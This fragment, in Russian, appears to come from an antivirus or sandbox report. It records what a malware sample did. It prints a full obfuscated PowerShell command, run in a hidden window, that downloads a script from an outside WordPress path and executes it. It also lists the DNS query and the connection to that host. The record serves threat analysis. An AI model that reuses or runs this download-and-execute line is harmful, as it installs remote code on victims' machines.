Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://therallyfund.com/wp-admin/css/d')
- 'th####lyfund.com':80
- DNS ASK th####lyfund.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://therallyfund.com/wp-admin/css/d')' (со скрытым окном)